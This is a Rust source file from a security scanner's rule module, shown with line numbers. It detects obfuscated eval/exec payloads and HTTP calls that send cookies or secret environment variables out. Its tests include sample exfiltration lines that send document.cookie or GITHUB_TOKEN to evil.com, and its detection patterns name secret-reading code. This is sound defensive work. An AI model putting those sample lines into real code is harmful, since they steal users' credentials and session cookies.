Skip to main content

tirith_core/rules/
codefile.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::rules::shared::SENSITIVE_KEY_VARS;
5use crate::script_analysis::detect_interpreter;
6use crate::verdict::{Evidence, Finding, RuleId, Severity};
7
8/// Code file extensions eligible for scanning.
9const CODE_EXTENSIONS: &[&str] = &[
10    "js", "mjs", "cjs", "ts", "mts", "jsx", "tsx", "py", "pyw", "sh", "bash", "zsh", "fish", "ps1",
11    "psm1", "rb", "php", "pl",
12];
13
14/// Returns true if the file is a code file that should be scanned.
15pub fn is_code_file(path: Option<&str>, content: &str) -> bool {
16    if let Some(p) = path {
17        let lower = p.to_lowercase();
18        if let Some(ext) = lower.rsplit('.').next() {
19            if CODE_EXTENSIONS.contains(&ext) {
20                return true;
21            }
22        }
23    }
24    // Extensionless files only count as code if a shebang names a known interpreter.
25    if content.starts_with("#!") {
26        let interp = detect_interpreter(content);
27        if !interp.is_empty() {
28            return true;
29        }
30    }
31    false
32}
33
34/// Run code file pattern scanning rules.
35pub fn check(input: &str, file_path: Option<&str>) -> Vec<Finding> {
36    let mut findings = Vec::new();
37
38    check_dynamic_code_execution(input, &mut findings);
39    check_obfuscated_payload(input, &mut findings);
40    check_suspicious_code_exfiltration(input, file_path, &mut findings);
41
42    findings
43}
44
45/// Pairs of regexes that fire when both match within `PROXIMITY_WINDOW` bytes —
46/// the shape of dynamic code evaluation on decoded/obfuscated payloads.
47static DYNAMIC_CODE_PAIRS: Lazy<Vec<(Regex, Regex, &'static str)>> = Lazy::new(|| {
48    vec![
49        // JS: eval( near atob(
50        (
51            Regex::new(r"eval\s*\(").unwrap(),
52            Regex::new(r"atob\s*\(").unwrap(),
53            "eval() near atob()",
54        ),
55        // JS: eval( near String.fromCharCode
56        (
57            Regex::new(r"eval\s*\(").unwrap(),
58            Regex::new(r"String\.fromCharCode").unwrap(),
59            "eval() near String.fromCharCode()",
60        ),
61        // JS: new Function( near encoded content
62        (
63            Regex::new(r"new\s+Function\s*\(").unwrap(),
64            Regex::new(r"(?:atob|String\.fromCharCode|Buffer\.from)\s*\(").unwrap(),
65            "new Function() near encoded content",
66        ),
67        // Python: exec( near b64decode/base64.b64decode
68        (
69            Regex::new(r"exec\s*\(").unwrap(),
70            Regex::new(r"b(?:ase)?64[._]?b?64decode|b64decode").unwrap(),
71            "exec() near b64decode()",
72        ),
73        // Python: exec(compile(
74        (
75            Regex::new(r"exec\s*\(\s*compile\s*\(").unwrap(),
76            Regex::new(r"compile\s*\(").unwrap(),
77            "exec(compile())",
78        ),
79        // Python: exec(__import__(
80        (
81            Regex::new(r"exec\s*\(\s*__import__\s*\(").unwrap(),
82            Regex::new(r"__import__\s*\(").unwrap(),
83            "exec(__import__())",
84        ),
85    ]
86});
87
88const PROXIMITY_WINDOW: usize = 500;
89
90fn check_dynamic_code_execution(input: &str, findings: &mut Vec<Finding>) {
91    for (pattern_a, pattern_b, description) in DYNAMIC_CODE_PAIRS.iter() {
92        for mat_a in pattern_a.find_iter(input) {
93            // Clamp to UTF-8 char boundaries: ±PROXIMITY_WINDOW offsets can land
94            // inside a multi-byte char (e.g. '═' is 3 bytes). Unclamped byte slicing
95            // would panic at the boundary.
96            let start = safe_start(input, mat_a.start().saturating_sub(PROXIMITY_WINDOW));
97            let end = safe_end(input, mat_a.end() + PROXIMITY_WINDOW);
98            let window = &input[start..end];
99
100            if pattern_b.is_match(window) {
101                findings.push(Finding {
102                    rule_id: RuleId::DynamicCodeExecution,
103                    severity: Severity::Medium,
104                    title: "Dynamic code execution with obfuscation".to_string(),
105                    description: format!("Detected {description} in close proximity"),
106                    evidence: vec![Evidence::CommandPattern {
107                        pattern: description.to_string(),
108                        matched: truncate(
109                            &input[mat_a.start()..safe_end(input, mat_a.end() + 80)],
110                            120,
111                        ),
112                    }],
113                    human_view: None,
114                    agent_view: None,
115                    mitre_id: None,
116                    custom_rule_id: None,
117                });
118                return;
119            }
120        }
121    }
122}
123
124static OBFUSCATED_DECODE_CALL: Lazy<Regex> = Lazy::new(|| {
125    Regex::new(
126        r#"(?:atob\s*\(\s*["']|b64decode\s*\(\s*b?["']|Buffer\.from\s*\(\s*["'])([A-Za-z0-9+/=]{40,})"#,
127    )
128    .unwrap()
129});
130
131static EXEC_EVAL_NEARBY: Lazy<Regex> =
132    Lazy::new(|| Regex::new(r"(?:eval|exec|Function)\s*\(").unwrap());
133
134fn check_obfuscated_payload(input: &str, findings: &mut Vec<Finding>) {
135    for cap in OBFUSCATED_DECODE_CALL.captures_iter(input) {
136        let full_match = cap.get(0).unwrap();
137        // Clamp to UTF-8 char boundaries — see safe_start/safe_end.
138        let start = safe_start(input, full_match.start().saturating_sub(PROXIMITY_WINDOW));
139        let end = safe_end(input, full_match.end() + PROXIMITY_WINDOW);
140        let window = &input[start..end];
141
142        if EXEC_EVAL_NEARBY.is_match(window) {
143            findings.push(Finding {
144                rule_id: RuleId::ObfuscatedPayload,
145                severity: Severity::Medium,
146                title: "Obfuscated payload with decode-execute".to_string(),
147                description:
148                    "Long base64 string decoded and executed — likely obfuscated malicious payload"
149                        .to_string(),
150                evidence: vec![Evidence::CommandPattern {
151                    pattern: "base64 decode + eval/exec".to_string(),
152                    matched: truncate(full_match.as_str(), 120),
153                }],
154                human_view: None,
155                agent_view: None,
156                mitre_id: None,
157                custom_rule_id: None,
158            });
159            return;
160        }
161    }
162}
163
164/// JS HTTP call patterns — must capture up to the opening `(`
165static JS_HTTP_CALL: Lazy<Regex> =
166    Lazy::new(|| Regex::new(r"(?:fetch\s*\(|axios\.\w+\s*\(|\.send\s*\()").unwrap());
167
168/// Python HTTP call patterns — must capture up to the opening `(`
169static PY_HTTP_CALL: Lazy<Regex> = Lazy::new(|| {
170    Regex::new(r"(?:requests\.(?:post|get|put)\s*\(|urllib\.request\.\w+\s*\()").unwrap()
171});
172
173/// Sensitive JS references: document.cookie or process.env.SENSITIVE_KEY
174static JS_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
175    let keys: Vec<String> = SENSITIVE_KEY_VARS
176        .iter()
177        .map(|k| regex::escape(k))
178        .collect();
179    Regex::new(&format!(
180        r"(?:document\.cookie|process\.env\.(?:{}))",
181        keys.join("|")
182    ))
183    .unwrap()
184});
185
186/// Sensitive Python references: os.environ["SENSITIVE_KEY"] or open("/etc/passwd")
187static PY_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
188    let keys: Vec<String> = SENSITIVE_KEY_VARS
189        .iter()
190        .map(|k| regex::escape(k))
191        .collect();
192    Regex::new(&format!(
193        r#"(?:os\.environ\[["'](?:{})["']\]|open\s*\(\s*["']/etc/(?:passwd|shadow)["'][^)]*\))"#,
194        keys.join("|")
195    ))
196    .unwrap()
197});
198
199/// Property keywords that indicate data/send context (fire the finding).
200static SEND_PROPS: Lazy<Regex> =
201    Lazy::new(|| Regex::new(r"(?i)(?:body|data|json|params|payload)\s*[:=]").unwrap());
202
203/// Any property-like keyword (`word:` or `word=`) — used to detect when a
204/// secret is inside an unknown property (like `meta:`) that is NOT a send context.
205static GENERIC_PROP: Lazy<Regex> = Lazy::new(|| Regex::new(r"\b\w+\s*[:=]").unwrap());
206
207/// Find the end of a call's argument list by matching the closing delimiter.
208/// `open_pos` must point to the character AFTER the opening `(`.
209/// Returns the byte position after the matching `)`, or None if unbalanced.
210///
211/// Handles: nested brackets, string literals (`"`, `'`, `` ` ``),
212/// block comments (`/* ... */`), line comments (`//`, `#`), and
213/// JS regex literals (heuristic: `/` preceded by a non-value byte).
214fn find_call_end(input: &[u8], open_pos: usize) -> Option<usize> {
215    let mut depth: u32 = 1;
216    let mut i = open_pos;
217    let mut in_string: Option<u8> = None;
218
219    while i < input.len() && depth > 0 {
220        let b = input[i];
221        match in_string {
222            Some(q) => {
223                if b == b'\\' && i + 1 < input.len() {
224                    i += 2;
225                    continue;
226                }
227                if b == q {
228                    in_string = None;
229                }
230            }
231            None => {
232                // Block comment `/* ... */`.
233                if b == b'/' && i + 1 < input.len() && input[i + 1] == b'*' {
234                    i += 2;
235                    while i + 1 < input.len() {
236                        if input[i] == b'*' && input[i + 1] == b'/' {
237                            i += 2;
238                            break;
239                        }
240                        i += 1;
241                    }
242                    continue;
243                }
244                // Line comment: `//` (JS) or `#` (Python/shell).
245                if (b == b'/' && i + 1 < input.len() && input[i + 1] == b'/') || b == b'#' {
246                    while i < input.len() && input[i] != b'\n' {
247                        i += 1;
248                    }
249                    continue;
250                }
251                // JS regex literal `/.../` — heuristic: `/` preceded by something
252                // that is NOT a value/identifier token means it can't be division.
253                if b == b'/' {
254                    let prev = {
255                        let mut j = i;
256                        while j > 0 && matches!(input[j - 1], b' ' | b'\t' | b'\n' | b'\r') {
257                            j -= 1;
258                        }
259                        if j > 0 {
260                            input[j - 1]
261                        } else {
262                            0
263                        }
264                    };
265                    let is_division = prev.is_ascii_alphanumeric()
266                        || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
267                    if !is_division {
268                        i += 1;
269                        while i < input.len() && input[i] != b'/' {
270                            if input[i] == b'\\' && i + 1 < input.len() {
271                                i += 1;
272                            }
273                            i += 1;
274                        }
275                        if i < input.len() {
276                            i += 1;
277                        }
278                        continue;
279                    }
280                }
281                match b {
282                    b'"' | b'\'' | b'`' => in_string = Some(b),
283                    b'(' | b'[' | b'{' => depth += 1,
284                    b')' | b']' | b'}' => depth -= 1,
285                    _ => {}
286                }
287            }
288        }
289        i += 1;
290    }
291    if depth == 0 {
292        Some(i)
293    } else {
294        None
295    }
296}
297
298fn check_suspicious_code_exfiltration(
299    input: &str,
300    file_path: Option<&str>,
301    findings: &mut Vec<Finding>,
302) {
303    let is_js = file_path
304        .map(|p| {
305            let lower = p.to_lowercase();
306            lower.ends_with(".js")
307                || lower.ends_with(".mjs")
308                || lower.ends_with(".cjs")
309                || lower.ends_with(".ts")
310                || lower.ends_with(".mts")
311                || lower.ends_with(".jsx")
312                || lower.ends_with(".tsx")
313        })
314        .unwrap_or(false);
315
316    let is_py = file_path
317        .map(|p| {
318            let lower = p.to_lowercase();
319            lower.ends_with(".py") || lower.ends_with(".pyw")
320        })
321        .unwrap_or(false);
322
323    // Extensionless files: read the shebang to decide which exfil checker applies.
324    let (is_js, is_py) = if !is_js && !is_py && file_path.is_some() {
325        let interp = detect_interpreter(input);
326        (
327            matches!(interp, "node" | "deno" | "bun"),
328            matches!(interp, "python" | "python3" | "python2"),
329        )
330    } else {
331        (is_js, is_py)
332    };
333
334    if is_js {
335        check_js_exfiltration(input, findings);
336    }
337    if is_py {
338        check_py_exfiltration(input, findings);
339    }
340}
341
342/// Walk bytes up to `pos` tracking strings, comments, and bracket depth.
343/// Returns `(depth, is_code)` at the target position.
344fn code_context_at(s: &[u8], pos: usize) -> (i32, bool) {
345    let mut depth: i32 = 0;
346    let mut in_string: Option<u8> = None;
347    let mut i = 0;
348
349    while i < s.len() {
350        if i == pos {
351            return (depth, in_string.is_none());
352        }
353        let b = s[i];
354        if let Some(q) = in_string {
355            if b == b'\\' && i + 1 < s.len() {
356                i += 2;
357                continue;
358            }
359            if b == q {
360                in_string = None;
361            }
362            i += 1;
363            continue;
364        }
365        if b == b'/' && i + 1 < s.len() && s[i + 1] == b'*' {
366            i += 2;
367            while i + 1 < s.len() {
368                if i == pos || i + 1 == pos {
369                    return (depth, false);
370                }
371                if s[i] == b'*' && s[i + 1] == b'/' {
372                    i += 2;
373                    break;
374                }
375                i += 1;
376            }
377            continue;
378        }
379        if (b == b'/' && i + 1 < s.len() && s[i + 1] == b'/') || b == b'#' {
380            while i < s.len() && s[i] != b'\n' {
381                if i == pos {
382                    return (depth, false);
383                }
384                i += 1;
385            }
386            continue;
387        }
388        // JS regex literal — see find_call_end for the same heuristic.
389        if b == b'/' {
390            let prev = {
391                let mut j = i;
392                while j > 0 && matches!(s[j - 1], b' ' | b'\t' | b'\n' | b'\r') {
393                    j -= 1;
394                }
395                if j > 0 {
396                    s[j - 1]
397                } else {
398                    0
399                }
400            };
401            let is_division = prev.is_ascii_alphanumeric()
402                || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
403            if !is_division {
404                i += 1;
405                while i < s.len() && s[i] != b'/' {
406                    if i == pos {
407                        return (depth, false);
408                    }
409                    if s[i] == b'\\' && i + 1 < s.len() {
410                        i += 1;
411                    }
412                    i += 1;
413                }
414                if i < s.len() {
415                    if i == pos {
416                        return (depth, false);
417                    }
418                    i += 1;
419                }
420                continue;
421            }
422        }
423        match b {
424            b'"' | b'\'' | b'`' => in_string = Some(b),
425            b'(' | b'[' | b'{' => depth += 1,
426            b')' | b']' | b'}' => depth -= 1,
427            _ => {}
428        }
429        i += 1;
430    }
431    (depth, in_string.is_none())
432}
433
434/// Decide whether to suppress the exfil finding for a secret at `pos_in_span`
435/// within the HTTP call's argument span.
436///
437/// Logic: find the nearest shallow (depth ≤ 1), in-code property keyword
438/// (`word:` or `word=`) before the secret.
439/// - If it's a SEND keyword (body/data/json/params/payload) → fire (return false)
440/// - If it's anything else (headers, meta, unknown) → suppress (return true)
441/// - If NO property keyword at all → secret is in direct-argument / URL-concat
442///   context → fire (return false)
443fn should_suppress_exfil(arg_span: &str, pos_in_span: usize) -> bool {
444    let before = &arg_span[..pos_in_span];
445    let bytes = before.as_bytes();
446
447    // Find the nearest property-like keyword at shallow depth in actual code.
448    let nearest_prop = GENERIC_PROP
449        .find_iter(before)
450        .filter(|m| {
451            let (depth, is_code) = code_context_at(bytes, m.start());
452            depth <= 1 && is_code
453        })
454        .last();
455
456    match nearest_prop {
457        Some(m) => {
458            if SEND_PROPS.is_match(m.as_str()) {
459                return false;
460            }
461            // Anything else (headers, auth, meta, token, unknown) is too noisy to flag.
462            true
463        }
464        // No surrounding property at all means the secret is a positional/URL arg.
465        None => false,
466    }
467}
468
469fn emit_exfil_finding(findings: &mut Vec<Finding>, call_snippet: &str, sens_str: &str) {
470    findings.push(Finding {
471        rule_id: RuleId::SuspiciousCodeExfiltration,
472        severity: Severity::Medium,
473        title: "Suspicious code exfiltration pattern".to_string(),
474        description: format!(
475            "HTTP call passes sensitive data '{}' as argument — potential data exfiltration",
476            sens_str
477        ),
478        evidence: vec![Evidence::CommandPattern {
479            pattern: "sensitive data inside HTTP call arguments".to_string(),
480            matched: truncate(call_snippet, 120),
481        }],
482        human_view: None,
483        agent_view: None,
484        mitre_id: None,
485        custom_rule_id: None,
486    });
487}
488
489fn check_js_exfiltration(input: &str, findings: &mut Vec<Finding>) {
490    let bytes = input.as_bytes();
491    for http_match in JS_HTTP_CALL.find_iter(input) {
492        let call_end = match find_call_end(bytes, http_match.end()) {
493            Some(end) => end,
494            None => continue,
495        };
496        // `call_end` walks raw bytes and can land inside a multi-byte char on
497        // non-ASCII input; clamp before slicing or we panic on the boundary.
498        let arg_end = safe_end(input, call_end.saturating_sub(1)).max(http_match.end());
499        let arg_span = &input[http_match.end()..arg_end];
500
501        for sens_match in JS_SENSITIVE.find_iter(arg_span) {
502            if should_suppress_exfil(arg_span, sens_match.start()) {
503                continue;
504            }
505            let snippet_end = safe_end(input, call_end.min(input.len()));
506            let snippet = &input[http_match.start()..snippet_end];
507            emit_exfil_finding(findings, snippet, sens_match.as_str());
508            return;
509        }
510    }
511}
512
513fn check_py_exfiltration(input: &str, findings: &mut Vec<Finding>) {
514    let bytes = input.as_bytes();
515    for http_match in PY_HTTP_CALL.find_iter(input) {
516        let call_end = match find_call_end(bytes, http_match.end()) {
517            Some(end) => end,
518            None => continue,
519        };
520        // See check_js_exfiltration for boundary-clamping rationale.
521        let arg_end = safe_end(input, call_end.saturating_sub(1)).max(http_match.end());
522        let arg_span = &input[http_match.end()..arg_end];
523
524        for sens_match in PY_SENSITIVE.find_iter(arg_span) {
525            if should_suppress_exfil(arg_span, sens_match.start()) {
526                continue;
527            }
528            let snippet_end = safe_end(input, call_end.min(input.len()));
529            let snippet = &input[http_match.start()..snippet_end];
530            emit_exfil_finding(findings, snippet, sens_match.as_str());
531            return;
532        }
533    }
534}
535
536/// Find the largest byte index ≤ `target` that falls on a UTF-8 char boundary.
537fn safe_end(s: &str, target: usize) -> usize {
538    let clamped = target.min(s.len());
539    let mut end = clamped;
540    while end > 0 && !s.is_char_boundary(end) {
541        end -= 1;
542    }
543    end
544}
545
546/// Find the smallest byte index ≥ `target` that falls on a UTF-8 char boundary.
547/// Mirrors `safe_end` for clamping the start of a window that was derived from
548/// an offset subtraction (e.g., `mat.start().saturating_sub(500)`).
549fn safe_start(s: &str, target: usize) -> usize {
550    let mut start = target.min(s.len());
551    while start < s.len() && !s.is_char_boundary(start) {
552        start += 1;
553    }
554    start
555}
556
557fn truncate(s: &str, max: usize) -> String {
558    if s.chars().count() <= max {
559        s.to_string()
560    } else {
561        let t: String = s.chars().take(max).collect();
562        format!("{t}...")
563    }
564}
565
566#[cfg(test)]
567mod tests {
568    use super::*;
569
570    #[test]
571    fn test_is_code_file_by_extension() {
572        assert!(is_code_file(Some("test.js"), ""));
573        assert!(is_code_file(Some("test.py"), ""));
574        assert!(is_code_file(Some("test.ts"), ""));
575        assert!(is_code_file(Some("test.sh"), ""));
576        assert!(is_code_file(Some("test.ps1"), ""));
577        assert!(!is_code_file(Some("notes.txt"), ""));
578        assert!(!is_code_file(Some("config.json"), ""));
579    }
580
581    #[test]
582    fn test_is_code_file_shebang() {
583        assert!(is_code_file(
584            Some("script"),
585            "#!/usr/bin/env python3\nimport os"
586        ));
587        assert!(is_code_file(Some("run"), "#!/bin/bash\necho hi"));
588        assert!(!is_code_file(Some("data"), "just some text"));
589    }
590
591    #[test]
592    fn test_dynamic_code_eval_atob() {
593        let input = r#"var x = eval(atob("SGVsbG8gV29ybGQ="));"#;
594        let findings = check(input, Some("test.js"));
595        assert!(
596            findings
597                .iter()
598                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
599            "eval+atob should fire DynamicCodeExecution"
600        );
601    }
602
603    #[test]
604    fn test_dynamic_code_exec_b64decode() {
605        let input = r#"exec(b64decode("SGVsbG8gV29ybGQ="))"#;
606        let findings = check(input, Some("test.py"));
607        assert!(
608            findings
609                .iter()
610                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
611            "exec+b64decode should fire DynamicCodeExecution"
612        );
613    }
614
615    #[test]
616    fn test_bare_eval_no_fire() {
617        let input = "eval(someVar);";
618        let findings = check(input, Some("test.js"));
619        assert!(
620            !findings
621                .iter()
622                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
623            "bare eval should not fire"
624        );
625    }
626
627    #[test]
628    fn test_eval_atob_distant_no_fire() {
629        let padding = "x".repeat(600);
630        let input = format!("eval(something);\n{padding}\natob('SGVsbG8=');");
631        let findings = check(&input, Some("test.js"));
632        assert!(
633            !findings
634                .iter()
635                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
636            "distant eval+atob should not fire"
637        );
638    }
639
640    #[test]
641    fn test_obfuscated_payload() {
642        let b64 = "A".repeat(50);
643        let input = format!(r#"eval(atob("{b64}"))"#);
644        let findings = check(&input, Some("test.js"));
645        assert!(
646            findings
647                .iter()
648                .any(|f| f.rule_id == RuleId::ObfuscatedPayload),
649            "long base64 in atob near eval should fire ObfuscatedPayload"
650        );
651    }
652
653    #[test]
654    fn test_exfil_fetch_cookie() {
655        let input = r#"fetch("https://evil.com/?d=" + document.cookie)"#;
656        let findings = check(input, Some("test.js"));
657        assert!(
658            findings
659                .iter()
660                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
661            "fetch + document.cookie should fire"
662        );
663    }
664
665    #[test]
666    fn test_exfil_fetch_env_token() {
667        let input = r#"fetch(url, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
668        let findings = check(input, Some("test.js"));
669        assert!(
670            findings
671                .iter()
672                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
673            "fetch + process.env.GITHUB_TOKEN in body should fire"
674        );
675    }
676
677    #[test]
678    fn test_exfil_auth_header_no_fire() {
679        let input = r#"fetch("/api/login", {headers: {"Authorization": "Bearer " + process.env.GITHUB_TOKEN}})"#;
680        let findings = check(input, Some("test.js"));
681        assert!(
682            !findings
683                .iter()
684                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
685            "Authorization header pattern should NOT fire"
686        );
687    }
688
689    #[test]
690    fn test_exfil_python_requests() {
691        let input = r#"requests.post(url, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
692        let findings = check(input, Some("test.py"));
693        assert!(
694            findings
695                .iter()
696                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
697            "requests.post + secret env should fire"
698        );
699    }
700
701    #[test]
702    fn test_normal_fetch_no_fire() {
703        let input = r#"fetch("/api/data").then(r => r.json())"#;
704        let findings = check(input, Some("test.js"));
705        assert!(
706            !findings
707                .iter()
708                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
709            "normal fetch should not fire"
710        );
711    }
712
713    #[test]
714    fn test_not_code_file_no_fire() {
715        let input = r#"eval(atob("SGVsbG8gV29ybGQ="));"#;
716        assert!(!is_code_file(Some("notes.txt"), input));
717    }
718
719    #[test]
720    fn test_internal_post_body_no_fire() {
721        let input = r#"requests.post("https://internal-api.example.com/log", json={"event": "login", "user": username})"#;
722        let findings = check(input, Some("test.py"));
723        assert!(
724            !findings
725                .iter()
726                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
727            "internal API POST without sensitive data should not fire"
728        );
729    }
730
731    #[test]
732    fn test_exfil_js_meta_property_no_fire() {
733        let input = r#"fetch(url, {meta: process.env.GITHUB_TOKEN})"#;
734        let findings = check(input, Some("test.js"));
735        assert!(
736            !findings
737                .iter()
738                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
739            "secret in non-send property 'meta:' should NOT fire"
740        );
741    }
742
743    #[test]
744    fn test_exfil_python_meta_kwarg_no_fire() {
745        let input = r#"requests.post(url, meta=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
746        let findings = check(input, Some("test.py"));
747        assert!(
748            !findings
749                .iter()
750                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
751            "secret in non-send kwarg 'meta=' should NOT fire"
752        );
753    }
754
755    #[test]
756    fn test_exfil_js_token_property_no_fire() {
757        let input = r#"fetch(url, {token: process.env.GITHUB_TOKEN})"#;
758        let findings = check(input, Some("test.js"));
759        assert!(
760            !findings
761                .iter()
762                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
763            "secret in non-send property 'token:' should NOT fire"
764        );
765    }
766
767    #[test]
768    fn test_exfil_query_concat_fires() {
769        let input = r#"fetch("https://evil.com/c?token=" + process.env.GITHUB_TOKEN)"#;
770        let findings = check(input, Some("test.js"));
771        assert!(
772            findings
773                .iter()
774                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
775            "URL query concat with secret should fire"
776        );
777    }
778
779    #[test]
780    fn test_exfil_separate_statement_no_fire() {
781        // Regression: secret lives in a separate statement, not in the fetch call's args.
782        let input = r#"fetch(url); const payload = { token: process.env.GITHUB_TOKEN };"#;
783        let findings = check(input, Some("test.js"));
784        assert!(
785            !findings
786                .iter()
787                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
788            "secret in separate statement (not in call args) should NOT fire"
789        );
790    }
791
792    #[test]
793    fn test_exfil_unrelated_body_object_no_fire() {
794        // body: keyword exists nearby but belongs to unrelated local object
795        let input = r#"fetch(url); const opts = { body: bodyVar }; const token = process.env.GITHUB_TOKEN;"#;
796        let findings = check(input, Some("test.js"));
797        assert!(
798            !findings
799                .iter()
800                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
801            "unrelated body object near fetch should NOT fire"
802        );
803    }
804
805    #[test]
806    fn test_exfil_document_cookie_not_sent_no_fire() {
807        // document.cookie is read but not passed as argument to the fetch call
808        let input = r#"fetch(url); console.log(document.cookie);"#;
809        let findings = check(input, Some("test.js"));
810        assert!(
811            !findings
812                .iter()
813                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
814            "document.cookie outside call args should NOT fire"
815        );
816    }
817
818    #[test]
819    fn test_exfil_document_cookie_inside_call_fires() {
820        // document.cookie IS passed inside the fetch call's args
821        let input = r#"fetch("https://evil.com/?c=" + document.cookie)"#;
822        let findings = check(input, Some("test.js"));
823        assert!(
824            findings
825                .iter()
826                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
827            "document.cookie inside call args should fire"
828        );
829    }
830
831    #[test]
832    fn test_exfil_block_comment_in_args() {
833        // `)` inside a block comment must not terminate the arg span
834        let input =
835            r#"fetch(url /* ) */, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
836        let findings = check(input, Some("test.js"));
837        assert!(
838            findings
839                .iter()
840                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
841            "block comment with ) inside call args should not break parser"
842        );
843    }
844
845    #[test]
846    fn test_exfil_python_line_comment_in_args() {
847        // `#` line comment with `)` must not terminate the arg span
848        let input = "requests.post(url, # )\n    data=os.environ[\"AWS_SECRET_ACCESS_KEY\"])";
849        let findings = check(input, Some("test.py"));
850        assert!(
851            findings
852                .iter()
853                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
854            "Python # comment with ) inside call args should not break parser"
855        );
856    }
857
858    #[test]
859    fn test_exfil_js_regex_literal_in_args() {
860        // regex literal /\(/ must not throw off delimiter counting
861        let input = r#"fetch(url, {body: /\(/, json: process.env.GITHUB_TOKEN})"#;
862        let findings = check(input, Some("test.js"));
863        assert!(
864            findings
865                .iter()
866                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
867            "JS regex literal with ( should not break parser"
868        );
869    }
870
871    #[test]
872    fn test_find_call_end_block_comment() {
873        let input = b"url /* ) */, data)";
874        assert_eq!(find_call_end(input, 0), Some(18));
875    }
876
877    #[test]
878    fn test_find_call_end_line_comment() {
879        let input = b"url, # )\n    data)";
880        assert_eq!(find_call_end(input, 0), Some(18));
881    }
882
883    #[test]
884    fn test_find_call_end_regex_literal() {
885        let input = br#"url, {body: /\(/, val})"#;
886        assert_eq!(find_call_end(input, 0), Some(23));
887    }
888
889    #[test]
890    fn test_exfil_headers_then_body_fires() {
891        let input = r#"fetch(url, {headers: {Authorization: auth}, body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
892        let findings = check(input, Some("test.js"));
893        assert!(
894            findings
895                .iter()
896                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
897            "secret in body after headers in same call should fire"
898        );
899    }
900
901    #[test]
902    fn test_exfil_python_headers_then_data_fires() {
903        let input =
904            r#"requests.post(url, headers=headers, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
905        let findings = check(input, Some("test.py"));
906        assert!(
907            findings
908                .iter()
909                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
910            "secret in data= after headers= in same call should fire"
911        );
912    }
913
914    #[test]
915    fn test_exfil_division_in_args_fires() {
916        let input = r#"fetch(url, {body: 1 / 2, json: process.env.GITHUB_TOKEN})"#;
917        let findings = check(input, Some("test.js"));
918        assert!(
919            findings
920                .iter()
921                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
922            "division operator in call args should not break parser"
923        );
924    }
925
926    #[test]
927    fn test_exfil_paren_division_in_args_fires() {
928        let input = r#"fetch(url, {body: (a / b), json: process.env.GITHUB_TOKEN})"#;
929        let findings = check(input, Some("test.js"));
930        assert!(
931            findings
932                .iter()
933                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
934            "parenthesized division in call args should not break parser"
935        );
936    }
937
938    #[test]
939    fn test_find_call_end_division() {
940        let input = b"url, {body: 1 / 2, val})";
941        assert_eq!(find_call_end(input, 0), Some(24));
942    }
943
944    #[test]
945    fn test_exfil_nested_headers_in_body_fires() {
946        let input = r#"fetch(url, {body: JSON.stringify({headers: "x", token: process.env.GITHUB_TOKEN})})"#;
947        let findings = check(input, Some("test.js"));
948        assert!(
949            findings
950                .iter()
951                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
952            "nested 'headers' key inside body payload should NOT suppress"
953        );
954    }
955
956    #[test]
957    fn test_exfil_python_nested_headers_in_data_fires() {
958        let input = r#"requests.post(url, data={"headers": "x", "token": os.environ["AWS_SECRET_ACCESS_KEY"]})"#;
959        let findings = check(input, Some("test.py"));
960        assert!(
961            findings
962                .iter()
963                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
964            "nested 'headers' key inside data= dict should NOT suppress"
965        );
966    }
967
968    #[test]
969    fn test_exfil_nested_headers_in_json_fires() {
970        let input = r#"fetch(url, {json: {headers: "x", token: process.env.GITHUB_TOKEN}})"#;
971        let findings = check(input, Some("test.js"));
972        assert!(
973            findings
974                .iter()
975                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
976            "nested 'headers' key inside json property should NOT suppress"
977        );
978    }
979
980    #[test]
981    fn test_exfil_python_hash_comment_headers_fires() {
982        let input = "requests.post(url, data={# headers: fake\n'token': os.environ[\"AWS_SECRET_ACCESS_KEY\"]})";
983        let findings = check(input, Some("test.py"));
984        assert!(
985            findings
986                .iter()
987                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
988            "# headers: inside comment must NOT suppress data= exfil"
989        );
990    }
991
992    #[test]
993    fn test_exfil_js_block_comment_headers_fires() {
994        let input =
995            r#"fetch(url, {/* headers: */ body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
996        let findings = check(input, Some("test.js"));
997        assert!(
998            findings
999                .iter()
1000                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
